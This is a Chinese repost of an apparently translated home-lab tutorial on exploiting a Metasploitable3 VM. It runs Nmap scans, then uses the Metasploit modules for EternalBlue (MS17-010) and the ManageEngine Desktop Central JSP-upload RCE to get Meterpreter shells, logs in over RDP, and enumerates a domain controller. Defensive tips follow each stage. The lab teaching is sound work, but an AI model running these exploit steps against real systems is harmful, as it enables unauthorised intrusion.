文章总结: 该文档详细介绍了在虚拟家庭实验室环境中进行系统漏洞利用的实战过程,包括使用Nmap进行目标发现与扫描,利用MS17-010(永恒之蓝)漏洞通过Metasploit获取Meterpreter会话,以及攻击ManageEngineDesktopCentral服务实现远程代码执行,最终通过RDP登录系统。文章强调了攻击者会利用多种攻击路径,并指出安全漏洞常源于未打补丁和暴露的服务,同时给出了相应的防御建议。 综合评分: 85 文章分类: 渗透测试,实战经验,漏洞分析,WEB安全,内网渗透
0134.构建虚拟道德黑客家庭实验室——第六部分:系统漏洞利用
原创
Omotola Omotola
Rsec
2026年2月28日 17:05 贵州
本文章仅用网络安全研究学习,请勿使用相关技术进行违法犯罪活动。
声明:本文搬运自互联网,如你是原作者,请联系我们!
类型:模拟攻击
横幅背景图来自 Freepik 的 Logturnal | 黑客卡通图来自 Freepik 的 Designer29
在这一集中,我们将利用这些机器的漏洞。目标很简单:识别出存在漏洞的服务,并像真正的攻击者一样利用它们。
内容模块
- 使用 Nmap 查找目标
- 利用 MS17-010(永恒之蓝)漏洞
- 利用第二个服务
- 扫描域控制器 (DC1)
现在,让我们开始吧!
启动攻击机(Kali Linux)和受害机(Metaspoloitable3)
使用 Nmap 查找目标
Ping/ARP 扫描——查找在线主机
#
在kali终端上:
sudo nmap -sn 192.168.199.0/24
📝 此命令仅执行主机发现(不涉及端口)。我们使用 192.168.199.0/24 网段,因为两台机器都位于该网段内。
我们可以看到192.168.199.196,这是受害者的 IP 地址。
#
扫描 Metasploitable3
#
运行以下命令
sudo nmap 192.168.199.196
这显示了受害者机器上开放的端口。
版本 + 操作系统检测扫描
sudo nmap -sV -O 192.168.199.196
· -sV → 服务版本
· -O → 操作系统指纹识别
📝 这次扫描可能需要一些时间……
你会看到一长串开放端口及其服务版本。
请注意端口 445/tcp(这是我们的入口点)
利用 MS17-010(永恒之蓝)漏洞
这是著名的 SMB 漏洞( WannaCry 就利用了这一点)。
#
让我们研究 MS17–010
Nmap SMB 漏洞脚本
#
在 Kali 终端中,运行以下命令:
sudo nmap - script smb-vuln-ms17–010 192.168.199.196
您可以看到 Microsoft SMBv1 中的远程代码执行漏洞。
这意味着该漏洞允许通过 SMBv1 在受害者机器上执行远程代码。
加载 Metasploit 模块
#
在msfconsole中执行:
use exploit/windows/smb/ms17_010_eternalblue
设置值:运行 show options 以了解要设置的参数
执行
Set RHOSTS 192.168.199.196
其他所有参数均已正确设置。
利用漏洞
#
输入 run 并按 Enter 键
如果成功,你会看到
Meterpreter 会话 1 已打开, 这意味着您已在目标计算机上建立了会话。
在 meterpreter 内部,您可以运行:
- sysinfo
- getuid
- shell
这证实我们已获得对受害系统的远程访问权限。
如何阻止这次攻击?
🔒 安装 MS17-010 补丁
🔒 禁用 SMBv1
🔒 防火墙阻止端口 445
🔒 IDS/IPS 检测
🔒 网络分割
利用第二个服务
真正的攻击者不会只依赖一条路径。
因此,我们将攻击第二个服务:运行在同一台机器上的存在漏洞的 ManageEngine Desktop Central 9 。
暂时不要退出 Metasploit 控制台。
- 目标:ManageEngine ServiceDesk / Desktop Central
- 攻击类型:Web 应用程序→远程代码执行
#
首先,让我们来寻找有效载荷。
search connectionid
更改有效载荷:
use exploit/windows/http/manageengine_connectionid_write
然后;
show options
你会发现你只需要设置 RHOSTS(目标 IP 地址)即可。
运行漏洞利用程序
run
会发生什么:
- 漏洞利用程序上传恶意 JSP 文件
- 触发它
- 你得到shell
我们现在又打开了一个 Meterpreter 会话。
让我们证明访问权限
📝 为了证明我们对该机器的访问权限;请注意,当我们对目标进行服务扫描时,端口 3389 是打开的。
由于端口 3389 已打开,该系统也暴露了远程桌面协议 (RDP) ,这是攻击者的另一种潜在访问方式。
为此,我们将使用 rdesktop 命令建立 RDP 连接。
在 Kali 终端上打开另一个标签页
运行以下命令:
rdesktop 192.168.199.196:3389
一个图形用户界面窗口弹出
登录受害者的电脑
登录成功!
您现在拥有对系统的完全交互式访问权限。
如何预防这种攻击
🔒 修补管理引擎
🔒 限制网络访问(防火墙)
🔒 使用 Web 应用程序防火墙 (WAF)
🔒 禁用不必要的网页上传功能
🔒 监控日志,查找可疑的 JSP 上传
🔒 通过防火墙规则或仅限 VPN 访问来限制 RDP 访问。
扫描域控制器 (DC1)
执行版本扫描
sudo nmap -sV 192.168.199.128
然后执行 SMB 脚本扫描
sudo nmap - script smb-os-discovery -p445 192.168.199.128
你会看到类似这样的内容:
Windows Server 2016 标准版
你知道的原因是:
- SMB 脚本揭示操作系统
- Kerberos 端口已打开 (88)
- LDAP 端口已开放(389)
- 域名服务呈现
在这一集中,我们从侦察越过了界限,真正入侵了系统。
通过结合服务枚举、漏洞验证和利用技术,我们展示了如何通过多种攻击路径入侵未打补丁的系统。
我们成功地:
🔓 已识别网络上的在线主播
🔓 发现存在漏洞的服务
🔓 使用漏洞脚本确认漏洞
🔓 利用 EternalBlue 漏洞攻击 SMB
🔓 使用不同类型的有效载荷获得了远程访问权限
🔓 通过服务枚举分析域控制器
本次实验最重要的启示是,攻击者不会依赖单一入口点。如果一项服务失效,另一项服务可能就会成功。
安全漏洞的出现往往不是因为高超的黑客技术,而是因为缺少补丁和暴露的服务。
该实验揭示了网络安全领域的一个关键事实:
一个系统的强度取决于其最薄弱的、暴露在外的服务的强度。
免责声明:
本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。
任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。
本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我。
本文转载自:Rsec Omotola Omotola《0134.构建虚拟道德黑客家庭实验室——第六部分:系统漏洞利用》
版权声明
本站仅做备份收录,仅供研究与教学参考之用。
读者将信息用于其他用途的,全部法律及连带责任由读者自行承担,本站不承担任何责任。
评论